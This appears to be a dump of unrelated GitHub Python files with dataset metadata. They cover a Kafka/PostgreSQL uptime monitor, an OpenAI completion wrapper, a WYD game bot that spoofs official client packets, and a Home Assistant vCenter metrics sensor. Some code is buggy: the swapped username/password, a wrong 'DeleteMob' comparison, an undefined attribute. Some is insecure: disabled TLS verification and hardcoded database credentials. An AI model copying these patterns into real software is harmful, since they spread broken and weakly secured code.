A class that fetches metrics from various sites & produces records to Apache Kafka.
Also, it consumes produced records from Kafka and sinks them to a PostgreSQL database
Usage:
sites_availability = SitesAvailability()
"""
def __init__(self):
"""
Initialize site availability operations.
"""
super().__init__()
self.kafka = KafkaClient()
self.sites = utils.read_file_to_list(utils.constants.SITES_FILE_PATH)
@staticmethod
def get_site_metrics(site):
"""
Fetches site metrics
:param site: Site to check
:return: Metrics dict for both successful and unsuccessful requests
"""
now = datetime.now()
request_time = now.strftime("%Y-%m-%d %H:%M:%S")
print("request_time={}".format(request_time))
try:
b = requests.get(site)
b.raise_for_status()
# Fetch request metrics for a successful request
http_response_time = b.elapsed.total_seconds()
status_code = b.status_code
# Search for title tag in HTML. Leave empty string if title not found.
search_text = re.search("<title>(.*?)</title>", b.text)
grouped_text = ''
if search_text:
grouped_text = search_text.group(1)
return {
"request_time": request_time,
"type": "SUCCESS",
"site_url": site,
"response_time_sec": http_response_time,
"status_code": status_code,
"regex_search": grouped_text
}
except requests.exceptions.RequestException as e:
return {
"request_time": request_time,
"type": "ERROR",
"site_url": site,
"exception_type": type(e).__name__
}
def produce_metrics_to_kafka(self):
"""
Polled fetching of metrics for each site in list.
:return: None
"""
for site in self.sites:
print('-----------------------------------')
print(site)
metrics = self.get_site_metrics(site)
if metrics['type'] == 'SUCCESS':
self.kafka.produce("success_topic", metrics['site_url'], metrics)
else:
self.kafka.produce("error_topic", metrics['site_url'], metrics)
def consume_metrics_sink_postgres(self, topics, group_id, auto_offset_reset, pg_table):
"""
Consume data process that stores received records to PostgreSQL table
:param topics: Kafka topics to subscribe
:param group_id: Kafka consumer group ID
:param auto_offset_reset: Read from start or end of stream. Valid values 'earliest' or 'latest'.
:param pg_table: PostgreSQL target table
:return: None
"""
consumer = self.kafka.create_consumer(group_id, auto_offset_reset)
print("Consuming Kafka Topic. Press Ctrl+C to exit")
consumer.subscribe(topics)
# Group rebalancing !!!!!!
con = PostgreSQLConnector("localhost", 5432, "sites", "postgres", "postgres")
try:
for msg in consumer:
print(f"Topic: {msg.topic}, Offset: {msg.offset}, Key: {msg.key}, Value: {msg.value}")
con.insert(pg_table, msg.value)
con.close()
except KeyboardInterrupt:
consumer.commit()
consumer.close()
con.close()
| cnatsis/sites-availability | src/SitesAvailability.py | SitesAvailability.py | py | 3,705 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "src.connectors.KafkaClient",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "src.utils.read_file_to_list",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "src.utils",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "src.... |
22193624498 | import openai
from src.models import ModelFinder
from src.ai.config import CODE_DEFAULT_MAX_TOKENS, CODE_DEFAULT_TEMPERATURE
class CodePromptResult:
def __init__(self, result: str, used_tokens: int) -> None:
self.result = result
self.used_tokens = used_tokens
def code_prompt(
input: str,
temperature: float = CODE_DEFAULT_TEMPERATURE,
max_tokens: int = CODE_DEFAULT_MAX_TOKENS,
echo_prompt: bool = True
) -> CodePromptResult:
response = openai.Completion.create(
model=ModelFinder.get_best_for_code().as_str,
prompt=input,
temperature=temperature,
max_tokens=max_tokens,
echo=echo_prompt
)
result = CodePromptResult(
result=response.choices[0].text,
used_tokens=response.usage.total_tokens
)
return result
| AgustinMDominguez/Prompt | prompter/src/ai/code.py | code.py | py | 825 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "src.ai.config.CODE_DEFAULT_TEMPERATURE",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "src.ai.config.CODE_DEFAULT_MAX_TOKENS",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "openai.Completion.create",
"line_number": 20,
"usage_type": ... |
37205546104 | # -*- coding: UTF-8 -*-
import pyee
import logging
import asyncio
import coloredlogs
from enum import Enum
from utils import MockTimeout
from models import dict2obj
from client_network import ClientNetwork
# Format colors in loggers
coloredlogs.DEFAULT_FIELD_STYLES['levelname']['color'] = 'yellow'
coloredlogs.install(level="DEBUG", fmt='[ %(asctime)s %(name)s ] %(levelname)s: %(message)s', datefmt='%d/%m/%y %H:%M:%S')
# Enum game stages
class ClientStage(Enum):
DISCONNECTED, CONNECTING, AUTHENTICATING, UNLOCKING_PINCODE, SELECTING_CHARACTER, WORLD = range(6)
class ClientGame(pyee.EventEmitter):
''' Clientless, able to simulate official client packets and connect to the game. '''
def __init__(self, loop, server_address):
''' Constructor '''
# inheritance constructor
pyee.EventEmitter.__init__(self)
# logger configure
self.logger = logging.getLogger(f"{id(self)}")
self.logger.name = self
# internal members
self._loop = loop
self._stage = ClientStage.DISCONNECTED
self.network = None
# default informations
self._values = {
"server address": server_address,
"message": None,
"username": None,
"password": None,
"objects": { }
}
# register handles of events
self.on("connected", self.handle_connected)
self.on("disconnected", self.handle_disconnected)
self.on("recv_packet", self.handle_recv_packet)
def __str__(self):
''' Return a string representation of the class instance. '''
return f"{self.__class__.__name__}<Index: {id(self):X}, Stage: {self._stage.name}, User: {self._values['username']}>"
@property
def last_message(self):
''' Returns the last message received by the server '''
return self._values['message']
@property
def objects(self):
''' Returns list of all objects in the field of view '''
if self._stage == ClientStage.WORLD:
return self._values['objects']
def get_object(self, index = None):
''' Returns the object with the specified index '''
object_index = index if index else self.network.session_index
if object_index in self._values['objects']:
return self._values['objects'][object_index]
def get_stage(self):
''' Get current instance stage '''
return self._stage
def set_stage(self, stage):
''' Update instance stage '''
self._stage = stage
self.emit("update_stage", stage)
async def authenticate(self, username, password, timeout = 3.0):
''' Connect and authenticate to the server '''
# check socket stage
if self._stage == ClientStage.DISCONNECTED:
# create intance of mock timeout
mock = MockTimeout(return_value = None)
try:
# event: establishing connection
self.set_stage(ClientStage.CONNECTING)
# setup extra members
self._values['message'] = None
self._values['objects'] = { }
# setup information to authentication
self._values['username'] = username
self._values['password'] = password
# start connection
transport, self.network = await self._loop.create_connection(lambda: ClientNetwork(self), *self._values['server address'])
# register event
@self.on("update_stage")
def handle_update_stage(stage):
if stage == ClientStage.DISCONNECTED:
mock.return_value = False
mock()
elif stage == ClientStage.UNLOCKING_PINCODE:
mock.return_value = True
mock()
# send authenticate packet
self.network.write_packet('Authenticate', {
# account informations
"password": self._values['username'],
"username": self._values['password'],
# required informations to fernando server
"mac_address": "\x31\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32",
})
# mock event wait
if not await mock.wait(timeout = timeout):
# force disconnect
self.network.close()
# remove event
self.remove_listener('update_stage', handle_update_stage)
except (ConnectionRefusedError, TimeoutError) as error:
self._values['message'] = "Connection Error"
self.logger.error(f"Could not establish connection to the server: {self._server_address}")
self.set_stage(ClientStage.DISCONNECTED)
# return operation result
return mock.return_value
# the instance is busy, it needs to be disconnected to start a new connection.
else:
return False
async def pincode(self, code, timeout = 3.0):
''' Confirm pincode on server '''
# check socket stage
if self._stage == ClientStage.UNLOCKING_PINCODE:
# create intance of mock timeout
mock = MockTimeout(return_value = None)
# register event
@self.on("update_stage")
def handle_update_stage(stage):
if stage == ClientStage.DISCONNECTED:
mock.return_value = False
mock()
elif stage == ClientStage.UNLOCKING_PINCODE:
mock.return_value = False
mock()
elif stage == ClientStage.SELECTING_CHARACTER:
mock.return_value = True
mock()
# send pincode request
self.network.write_packet("Pincode", { "code": code })
# mock event wait
if not await mock.wait(timeout = timeout):
# force disconnect
self.network.close()
# remove event
self.remove_listener('update_stage', handle_update_stage)
# return operation result
return mock.return_value
else:
return False
async def select_char(self, index, timeout = 3.0):
''' Select character '''
# check socket stage
if self._stage == ClientStage.SELECTING_CHARACTER:
# create intance of mock timeout
mock = MockTimeout(return_value = None)
# register event
@self.on("update_stage")
def handle_update_stage(stage):
if stage == ClientStage.DISCONNECTED:
mock.return_value = False
mock()
elif stage == ClientStage.WORLD:
mock.return_value = True
mock()
# send select char request
self.network.write_packet("SelectChar", { "index": index })
# mock event wait
if not await mock.wait(timeout = timeout):
# force disconnect
self.network.close()
# remove event
self.remove_listener('update_stage', handle_update_stage)
# return operation result
return mock.return_value
else:
return False
def logout(self):
''' Disconnect from server '''
if self._stage.value >= ClientStage.AUTHENTICATING.value:
self.network.close()
def handle_connected(self, network):
''' Handle called when socket is connected '''
self.logger.debug("handle_connected")
self.set_stage(ClientStage.AUTHENTICATING)
def handle_disconnected(self, network):
''' Handle called when socket is disconnected '''
self.logger.debug("handle_disconnected")
self.set_stage(ClientStage.DISCONNECTED)
def handle_recv_packet(self, network, packet_opcode, packet_name, packet_data):
''' Handle called when socket received packet '''
if packet_name[:7] == 'UNKNOWN':
self.logger.debug("recv_packet: { Size: %d, Session: %d, Name: '%s' }" % (packet_data.header.size, packet_data.header.session, packet_name))
else:
self.logger.debug("recv_packet: { Size: %d, Session: %d, Name: '%s' }" % (packet_data.header.size, packet_data.header.session, packet_name))
# Update useful information to generate packet keys, packet timestamp and update stages.
if packet_name == "Authenticate":
self.network.set_session_timer(packet_data.header.timestamp)
self.network.set_session_keys(packet_data.key_hash)
self.set_stage(ClientStage.UNLOCKING_PINCODE)
# Update stage warn that it failed, this can be removed with adaptations in function pincode.
elif packet_name == "PincodeRefused":
self.set_stage(ClientStage.UNLOCKING_PINCODE)
# Update stage
elif packet_name == "PincodeAccepted":
self.set_stage(ClientStage.SELECTING_CHARACTER)
# Update your own character's session index and information to generate packet timestamp.
elif packet_name == "EnterWorld":
self.network.set_session_timer(packet_data.header.timestamp)
self.network.set_session_index(packet_data.session_index)
self.set_stage(ClientStage.WORLD)
# Include object in list
elif packet_name == "CreateMob":
self._values['objects'][packet_data.index] = dict2obj({
'name': packet_data.name,
'speed': packet_data.score.move.speed,
'position': {
'x': packet_data.position.x,
'y': packet_data.position.y
}
})
# Delete object that left the field of view.
elif packet_data == "DeleteMob":
self._values['objects'].pop(packet_data.header.session)
# Update object position.
elif packet_name == "Movement":
self._values['objects'][packet_data.header.session].position.x = packet_data.destiny.x
self._values['objects'][packet_data.header.session].position.y = packet_data.destiny.y
# Update last message received from the server.
elif packet_name == "ServerMessage":
self._values['message'] = packet_data.text
# TODO: This should not update every packet, this was a temporary solution that i found.
self.network.set_session_timer(packet_data.header.timestamp)
| xBrunoMedeiros/wyd-bot | client_game.py | client_game.py | py | 8,848 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "coloredlogs.DEFAULT_FIELD_STYLES",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "coloredlogs.install",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "enum.Enum",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "p... |
25588514888 | # import atexit
import time
import json
from datetime import timedelta
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION,CONF_TYPE)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.event import track_time_interval
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
TIME_BETWEEN_UPDATES = timedelta(seconds=60)
CONF_USERNAME = "username"
CONF_PASSWORD = "password"
CONF_VCHOST = "vchost"
CONF_PORT = "port"
CONF_DATASTORE = "datastore"
CONF_ESXI = "esxi"
CONF_VM = "vm"
CONF_METRIC = "metric"
DATASTORE_DEFAULT="capacity"
CONF_ATTRIBUTION="Powered by Syjjx"
REQUIREMENTS = ['pyvmomi==6.7']
from pyVmomi import vim, vmodl
from pyVim.connect import SmartConnectNoSSL#, Disconnect
DATASTORE = {
"freePercent": ["datastore_freePercent", "存储剩余容量百分比", "mdi:harddisk", "%"]
}
ESXI = {
"if_in": ["esxi_net_if_in", "下载速度", "mdi:server-network", "mbps"],
"if_out": ["esxi_net_if_out", "上传速度", "mdi:server-network", "mbps"],
"memory": ["esxi_memory_freePercent", "内存使用率", "mdi:memory", "%"],
"cpu": ["esxi_cpu_usage", "CPU使用率", "mdi:memory", "%"],
"uptime": ["esxi_uptime", "开机时间", "mdi:clock", ""],
}
VM = {
"if_in": ["vm_net_if_in", "下载速度", "mdi:server-network", "mbps"],
"if_out": ["vm_net_if_out", "上传速度", "mdi:server-network", "mbps"],
"io_write": ["vm_datastore_io_write_bytes", "写流量", "mdi:harddisk", "MB/s"],
"io_read": ["vm_datastore_io_read_bytes", "读流量", "mdi:harddisk", "MB/s"],
"memory": ["vm_memory_freePercent", "内存使用率", "mdi:memory", "%"],
"cpu": ["vm_cpu_usage", "CPU使用率", "mdi:memory", "%"],
"uptime": ["vm_uptime", "开机时间", "mdi:clock", ""]
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Required(CONF_VCHOST): cv.string,
vol.Optional(CONF_PORT,default=443): cv.string,
vol.Optional(CONF_DATASTORE):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TYPE): cv.string,
vol.Optional(CONF_METRIC): cv.ensure_list,
})]),
vol.Optional(CONF_ESXI):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TYPE): cv.string,
vol.Optional(CONF_METRIC): cv.ensure_list,
})]),
vol.Optional(CONF_VM):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TYPE): cv.string,
vol.Optional(CONF_METRIC): cv.ensure_list,
})]),
})
def setup_platform(hass, config, add_devices, discovery_info=None):
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
vchost = config.get(CONF_VCHOST)
port = config.get(CONF_PORT)
dev = []
datastore_names = []
esxi_names = []
vm_names = []
client = Hello_Esxi(vchost,username,password,port=port)
if client.vcenter_status[0] == True:
json_vcenter_status=json.loads(client.vcenter_status[1])
_LOGGER.error(client.vcenter_status[1])
for datastore in config[CONF_DATASTORE]:
if datastore[CONF_TYPE] in json_vcenter_status['datastore']:
datastore_names.append(datastore[CONF_TYPE])
client.set_datastore_names(datastore_names)
if datastore.get(CONF_METRIC) !=None:
for key in datastore[CONF_METRIC]:
dev.append(EsxiSensor([datastore[CONF_TYPE],datastore[CONF_TYPE]+'_'+DATASTORE[key][0],'datastore'],DATASTORE[key],client))
else:
for key in DATASTORE:
dev.append(EsxiSensor([datastore[CONF_TYPE],datastore[CONF_TYPE]+'_'+DATASTORE[key][0],'datastore'],DATASTORE[key],client))
else:
_LOGGER.error("You don't have DATASTORE named {} !".format(datastore[CONF_TYPE]))
for esxi in config[CONF_ESXI]:
if esxi[CONF_TYPE] in json_vcenter_status['esxi']:
esxi_names.append(esxi[CONF_TYPE])
client.set_esxi_names(esxi_names)
if esxi.get(CONF_METRIC) !=None:
for key in esxi[CONF_METRIC]:
dev.append(EsxiSensor([esxi[CONF_TYPE],esxi[CONF_TYPE]+'_'+ESXI[key][0],'esxi'],ESXI[key],client))
else:
for key in ESXI:
dev.append(EsxiSensor([esxi[CONF_TYPE],esxi[CONF_TYPE]+'_'+ESXI[key][0],'esxi'],ESXI[key],client))
else:
_LOGGER.error("You don't have ESXI named {} !".format(esxi[CONF_TYPE]))
for vm in config[CONF_VM]:
if vm[CONF_TYPE] in json_vcenter_status['vm']:
vm_names.append(vm[CONF_TYPE])
client.set_vm_names(vm_names)
if vm.get(CONF_METRIC) !=None:
for key in vm[CONF_METRIC]:
# _LOGGER.error(vm[CONF_TYPE]+'_'+VM[key][0])
dev.append(EsxiSensor([vm[CONF_TYPE],vm[CONF_TYPE]+'_'+VM[key][0],'vm'],VM[key],client))
else:
for key in VM:
# _LOGGER.error(vm[CONF_TYPE]+'_'+VM[key][0])
dev.append(EsxiSensor([vm[CONF_TYPE],vm[CONF_TYPE]+'_'+VM[key][0],'vm'],VM[key],client))
else:
_LOGGER.error("You don't have VM named {} !".format(vm[CONF_TYPE]))
client.start(hass)
add_devices(dev, True)
else:
_LOGGER.error(client.vcenter_status[1])
class EsxiSensor(Entity):
def __init__(self,name,option,data):
"""初始化."""
self._interval=60
self._data = data
self._object_id = name
self._friendly_name = 'null'
self._icon = option[2]
self._unit_of_measurement = option[3]
self.attributes={ATTR_ATTRIBUTION: CONF_ATTRIBUTION}
self._type = option
self._state = None
self._updatetime = None
@property
def name(self):
"""返回实体的名字."""
return self._object_id[1]
@property
def registry_name(self):
"""返回实体的friendly_name属性."""
return self._friendly_name
@property
def state(self):
"""返回当前的状态."""
return self._state
@property
def icon(self):
"""返回icon属性."""
return self._icon
@property
def unit_of_measurement(self):
"""返回unit_of_measuremeng属性."""
return self._unit_of_measurement
@property
def device_state_attributes(self):
"""设置其它一些属性值."""
if self._state is not None:
return self.attributes
def update(self):
if self._object_id[2] == 'datastore':
self._friendly_name = self._object_id[0]
self._state = round((100-json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]]),2)
self.attributes['容量']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["datastore_capacity"]/1073741824),2))+'GB'
self.attributes['已用']=str(round(((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["datastore_capacity"]
-json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["datastore_free"])/1073741824),2))+'GB'
elif self._object_id[2] == 'esxi':
self._friendly_name = self._object_id[1]
if self._type[0] == 'esxi_memory_freePercent':
self._state = round((100-json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]]),2)
self.attributes['内存容量']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["esxi_memory_capacity"]/1073741824),2))+'GB'
self.attributes['已用内存']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["esxi_memory_usage"]/1073741824),2))+'GB'
elif self._type[0] == 'esxi_net_if_in' or self._type[0] == 'esxi_net_if_out':
self._state = round(((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])/1024/1024),2)
elif self._type[0] == 'esxi_cpu_usage':
self._state = round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]]),2)
else:
# _LOGGER.error(json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])
self._state = timedelta(seconds=json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])
elif self._object_id[2] == 'vm':
self._friendly_name = self._object_id[1]
if json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["powerState"] != "poweredOn":
self._state = 0
elif self._type[0] == 'vm_memory_freePercent':
self._state = round((100-json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]]),2)
self.attributes['内存容量']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_memory_capacity"]/1073741824),2))+'GB'
self.attributes['已用内存']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_memory_usage"]/1073741824),2))+'GB'
elif self._type[0] == 'vm_net_if_in' or self._type[0] == 'vm_net_if_out':
self._state = round(((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])/1024/1024),2)
elif self._type[0] == 'vm_cpu_usage':
self._state = round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]]),2)
elif self._type[0] == 'vm_datastore_io_write_bytes':
self._state = round(((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])/1024/1024),2)
self.attributes['写延迟']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_datastore_io_write_latency"]),2))+'ms'
self.attributes['写IOPS']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_datastore_io_write_numbers"]),2))
elif self._type[0] == 'vm_datastore_io_read_bytes':
self._state = round(((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])/1024/1024),2)
self.attributes['读延迟']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_datastore_io_read_latency"]),2))+'ms'
self.attributes['读IOPS']=str(round((json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]]["vm_datastore_io_read_numbers"]),2))
else:
self._state = timedelta(seconds=json.loads(self._data.vcenter_info)[self._object_id[2]][self._object_id[0]][self._type[0]])
class Hello_Esxi():
def __init__(self,vchost,username,password,port=443):
self._vcenter_status={"datastore":[],"esxi":[],"vm":[]}
self._vchost=vchost
self._username=username
self._password=password
self._port=port
self._payload=[]
self._interval=60
self._data={"datastore":{},"esxi":{},"vm":{}}
self.success,self.msg=self.hello_vcenter()
def start(self,hass):
if self.success == True:
self.run(dt_util.now())
# 每隔TIME_BETWEEN_UPDATES,调用一次run(),
track_time_interval(hass, self.run, TIME_BETWEEN_UPDATES)
else:
_LOGGER.error(self.msg)
def set_datastore_names(self,value):
self._datastore_names=value
def set_esxi_names(self,value):
self._esxi_names=value
def set_vm_names(self,value):
self._vm_names=value
def hello_vcenter(self):
try:
self.si = SmartConnectNoSSL(
host=self._vchost,
user=self._username,
pwd=self._password,
port=self._port)
hello_content = self.si.RetrieveContent()
for datacenter in hello_content.rootFolder.childEntity:
for ds in datacenter.datastore:
self._vcenter_status['datastore'].append(ds.name)
if hasattr(datacenter.hostFolder, 'childEntity'):
hostFolder = datacenter.hostFolder
computeResourceList = []
computeResourceList = self._getComputeResource(hostFolder,computeResourceList)
for computeResource in computeResourceList:
for host in computeResource.host:
self._vcenter_status['esxi'].append(host.name)
obj = hello_content.viewManager.CreateContainerView(hello_content.rootFolder, [vim.VirtualMachine], True)
for vm in obj.view:
self._vcenter_status['vm'].append(vm.name)
return True, json.dumps(self._vcenter_status,indent=4)
except vmodl.MethodFault as error:
return False, error.msg
except Exception as e:
return False, str(e)
@property
def vcenter_status(self):
return self.success,self.msg
@property
def vcenter_info(self):
return json.dumps(self._data,indent=4)
def _add_data(self,Resource,name,value):
# data = {"endpoint":'S_Vcenter',"metric":metric,"timestamp":self.ts,"step":self._interval,"value":value,"counterType":conterType,"tags":tags}
self._data[Resource][name] = value
self._payload.append(self._data)
def _DatastoreInformation(self,datastore,datacenter_name):
try:
summary = datastore.summary
name = summary.name
TYPE = summary.type
tags = {"datacenter":datacenter_name,"datastore":name,"type":TYPE}
capacity = summary.capacity
# self._add_data("datastore_capacity",capacity,"GAUGE",tags)
freeSpace = summary.freeSpace
# self._add_data("datastore_free",freeSpace,"GAUGE",tags)
freeSpacePercentage = (float(freeSpace) / capacity) * 100
# self._add_data("datastore_freePercent",freeSpacePercentage,"GAUGE",tags)
value={"datastore_capacity":capacity,"datastore_free":freeSpace,"datastore_freePercent":freeSpacePercentage}
self._add_data("datastore",name,value)
except Exception as error:
_LOGGER.error( "Unable to access summary for datastore: ", datastore.name)
_LOGGER.error( error)
pass
def _getComputeResource(self,Folder,computeResourceList):
if hasattr(Folder, 'childEntity'):
for computeResource in Folder.childEntity:
self._getComputeResource(computeResource,computeResourceList)
else:
computeResourceList.append(Folder)
return computeResourceList
def _ComputeResourceInformation(self,computeResource,datacenter_name,content,perf_dict,vchtime,interval):
try:
hostList = computeResource.host
computeResource_name = computeResource.name
for host in hostList:
if (host.name in self._esxi_names) or (len(self._esxi_names) == 0):
self._HostInformation(host,datacenter_name,computeResource_name,content,perf_dict,vchtime,interval)
except Exception as error:
_LOGGER.error( "Unable to access information for compute resource: ", computeResource.name)
_LOGGER.error( error)
pass
def _HostInformation(self,host,datacenter_name,computeResource_name,content,perf_dict,vchtime,interval):
try:
statInt = interval/20
summary = host.summary
stats = summary.quickStats
hardware = host.hardware
tags = "datacenter=" + datacenter_name + ",cluster_name=" + computeResource_name + ",host=" + host.name
uptime = stats.uptime
cpuUsage = 100 * 1000 * 1000 * float(stats.overallCpuUsage) / float(hardware.cpuInfo.numCpuCores * hardware.cpuInfo.hz)
memoryCapacity = hardware.memorySize
memoryUsage = stats.overallMemoryUsage * 1024 * 1024
freeMemoryPercentage = 100 - (
(float(memoryUsage) / memoryCapacity) * 100
)
statNetworkTx = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'net.transmitted.average')), "", host, interval)
networkTx = (float(sum(statNetworkTx[0].value[0].value) * 8 * 1024) / statInt)
statNetworkRx = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'net.received.average')), "", host, interval)
networkRx = (float(sum(statNetworkRx[0].value[0].value) * 8 * 1024) / statInt)
value={"esxi_uptime":uptime,"esxi_cpu_usage":cpuUsage,"esxi_memory_capacity":memoryCapacity,"esxi_memory_usage":memoryUsage,
"esxi_memory_freePercent":freeMemoryPercentage,"esxi_net_if_out":networkTx,"esxi_net_if_in":networkRx}
self._add_data("esxi",host.name,value)
except Exception as error:
_LOGGER.error( "Unable to access information for host: ", host.name)
_LOGGER.error( error)
pass
def _BuildQuery(self,content, vchtime, counterId, instance, entity, interval):
perfManager = content.perfManager
metricId = vim.PerformanceManager.MetricId(counterId=counterId, instance=instance)
startTime = vchtime - timedelta(seconds=(interval + 60))
endTime = vchtime - timedelta(seconds=60)
query = vim.PerformanceManager.QuerySpec(intervalId=20, entity=entity, metricId=[metricId], startTime=startTime,
endTime=endTime)
perfResults = perfManager.QueryPerf(querySpec=[query])
if perfResults:
return perfResults
else:
return False
def _perf_id(self,perf_dict, counter_name):
counter_key = perf_dict[counter_name]
return counter_key
def _VmInfo(self,vm,content,vchtime,interval,perf_dict,tags):
try:
statInt = interval/20
summary = vm.summary
stats = summary.quickStats
uptime = stats.uptimeSeconds
cpuUsage = 100 * float(stats.overallCpuUsage)/float(summary.runtime.maxCpuUsage)
memoryUsage = stats.guestMemoryUsage * 1024 * 1024
memoryCapacity = summary.runtime.maxMemoryUsage * 1024 * 1024
freeMemoryPercentage = 100 - (
(float(memoryUsage) / memoryCapacity) * 100
)
statDatastoreRead = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.read.average')),"*", vm, interval)
if statDatastoreRead!=False:
DatastoreRead = (float(sum(statDatastoreRead[0].value[0].value) * 1024) / statInt)
else:
DatastoreRead = 0
statDatastoreWrite = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.write.average')),"*", vm, interval)
if statDatastoreWrite!=False:
DatastoreWrite = (float(sum(statDatastoreWrite[0].value[0].value) * 1024) / statInt)
else:
DatastoreWrite = 0
statDatastoreIoRead = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.numberReadAveraged.average')),"*", vm, interval)
if statDatastoreIoRead!=False:
DatastoreIoRead = (float(sum(statDatastoreIoRead[0].value[0].value)) / statInt)
else:
DatastoreIoRead = 0
statDatastoreIoWrite = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.numberWriteAveraged.average')),"*", vm, interval)
if statDatastoreIoWrite!=False:
DatastoreIoWrite = (float(sum(statDatastoreIoWrite[0].value[0].value)) / statInt)
else:
DatastoreIoWrite = 0
statDatastoreLatRead = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.totalReadLatency.average')), "*", vm, interval)
if statDatastoreLatRead!=False:
DatastoreLatRead = (float(sum(statDatastoreLatRead[0].value[0].value)) / statInt)
else:
DatastoreLatRead = 0
statDatastoreLatWrite = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.totalWriteLatency.average')), "*", vm, interval)
if statDatastoreLatWrite!=False:
DatastoreLatWrite = (float(sum(statDatastoreLatWrite[0].value[0].value)) / statInt)
else:
DatastoreLatWrite = 0
statNetworkTx = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'net.transmitted.average')), "", vm, interval)
if statNetworkTx != False:
networkTx = (float(sum(statNetworkTx[0].value[0].value) * 8 * 1024) / statInt)
else:
networkTx = 0
statNetworkRx = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'net.received.average')), "", vm, interval)
if statNetworkRx != False:
networkRx = (float(sum(statNetworkRx[0].value[0].value) * 8 * 1024) / statInt)
else:
networkRx = 0
value={"powerState":vm.runtime.powerState,"vm_uptime":uptime,"vm_cpu_usage":cpuUsage,"vm_memory_capacity":memoryCapacity,"vm_memory_usage":memoryUsage,
"vm_memory_freePercent":freeMemoryPercentage,"vm_net_if_out":networkTx,"vm_net_if_in":networkRx,
"vm_datastore_io_read_bytes":DatastoreRead,"vm_datastore_io_write_bytes":DatastoreWrite,
"vm_datastore_io_read_numbers":DatastoreIoRead,"vm_datastore_io_write_numbers":DatastoreIoWrite,
"vm_datastore_io_read_latency":DatastoreLatRead,"vm_datastore_io_write_latency":DatastoreLatWrite}
self._add_data("vm",vm.name,value)
except Exception as error:
_LOGGER.error( "Unable to access information for host: ", vm.name)
_LOGGER.error( error)
pass
def run(self,now):
self.ts = int(time.time())
try:
content = self.si.RetrieveContent()
vchtime = self.si.CurrentTime()
perf_dict = {}
perfList = content.perfManager.perfCounter
for counter in perfList:
counter_full = "{}.{}.{}".format(counter.groupInfo.key, counter.nameInfo.key, counter.rollupType)
perf_dict[counter_full] = counter.key
for datacenter in content.rootFolder.childEntity:
datacenter_name = datacenter.name
datastores = datacenter.datastore
for ds in datastores:
if (ds.name in self._datastore_names) or (len(self._datastore_names) == 0):
self._DatastoreInformation(ds,datacenter_name)
if hasattr(datacenter.hostFolder, 'childEntity'):
hostFolder = datacenter.hostFolder
computeResourceList = []
computeResourceList = self._getComputeResource(hostFolder,computeResourceList)
for computeResource in computeResourceList:
self._ComputeResourceInformation(computeResource,datacenter_name,content,perf_dict,vchtime,self._interval)
obj = content.viewManager.CreateContainerView(content.rootFolder, [vim.VirtualMachine], True)
for vm in obj.view:
if (vm.name in self._vm_names) or (len(self._vm_names) == 0):
tags = "vm=" + vm.name
if vm.runtime.powerState == "poweredOn":
self._VmInfo(vm, content, vchtime, self._interval, perf_dict, tags)
else:
